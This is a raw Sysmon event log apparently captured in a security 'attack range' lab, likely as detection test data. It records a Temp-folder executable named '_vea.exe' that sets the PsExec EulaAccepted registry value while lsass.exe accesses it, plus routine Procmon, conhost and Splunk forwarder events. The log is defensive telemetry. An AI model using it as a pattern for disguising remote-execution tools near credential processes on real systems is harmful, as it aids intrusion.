11:00:52.263{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000294053Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:00:52.250{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000294052Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.181{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-13E4-6216-7F06-000000003802}6324C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294051Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.180{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-13E4-6216-7F06-000000003802}6324C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.163{C8EA50B7-13E4-6216-7F06-000000003802}63246896C:\Windows\system32\conhost.exe{C8EA50B7-13E3-6216-7E06-000000003802}5228C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.124{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-13E4-6216-7F06-000000003802}6324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.117{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-13E4-6216-7F06-000000003802}6324C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000218458Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:52.450{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B5043B4B2395864E4DF2C2C09E93B720,SHA256=8D27F673982DE6A98CDAEE821C2FE692F099B9ECE7C2ACE17BFD5BE0A38CFF66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218460Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:53.637{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6573E6F3629B66F420CA38C96069EDDF,SHA256=1697FA2E462FBDF0FD423FA07BA6360F99D8C9C8E6640B001045A0B0CE772977,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294063Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:51.732{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53857-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000294062Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:53.602{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294061Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:53.602{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294060Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:53.602{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294059Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:53.431{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6694391E7F550D495B5D55A6471678B0,SHA256=95C9AFC1784DB01020711CC9226BCC21AE73855E67111C4CD26B40755B1BEC4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218461Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:54.700{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B11DFAF30FA1FD0CA3CBA3580B3B4BB7,SHA256=47A02F18D723B39FFECBD76C14755291D1E47BD889DD806B88A0FD141C2FE8A5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:52.827{C8EA50B7-F130-6215-2E00-000000003802}1748C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local51595- 10341000x8000000000000000294070Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:54.564{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294069Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:54.564{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294068Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:54.564{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294067Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:54.465{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+617df|C:\Windows\System32\SHELL32.dll+63325|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294066Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:54.465{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6323e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294065Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:54.465{C8EA50B7-F2AD-6215-C000-000000003802}48564340C:\Windows\Explorer.EXE{C8EA50B7-11CB-6216-2005-000000003802}2328C:\Users\Administrator\Downloads\Procmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294064Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:54.433{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DECF9D642E22DE1595AD0E33639C4CD,SHA256=F7DC9997550468013A8E18F64FEA2B8E2F7AFFF768E56AFAE1478CDA2A944E32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:00:55.918{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5E3DDB11AB67639F060C6A9F5D14E83,SHA256=4EE9DE33DA13FC3D334B7597AD02CA730EB39063C0423EFE2FE79D76F6DB205A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:55.479{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C60DB43964A929B2D99B6462461612CB,SHA256=969C2A8EEFAD2B8E22732732EF05545238DAC968FA8FF01E1F2E0181745ADDAB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.650{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.650{C8EA50B7-F11D-6215-0B00-000000003802}6281356C:\Windows\system32\lsass.exe{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000294087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.581{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C93954F6F4C7C72C564BFB0A572EF27,SHA256=1062BC1029E2A8FB82A572AF425AF1639C021CA1168BC230DECBA7B3267ACBA0,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000294086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 11:00:56.581{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000294085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.466{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-13E8-6216-8106-000000003802}6476C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.466{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-13E8-6216-8106-000000003802}6476C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.403{C8EA50B7-13E8-6216-8106-000000003802}64761972C:\Windows\system32\conhost.exe{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.316{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-13E8-6216-8106-000000003802}6476C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.297{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-13E8-6216-8106-000000003802}6476C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.147{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-13E8-6216-8006-000000003802}5776C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:00:56.147{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 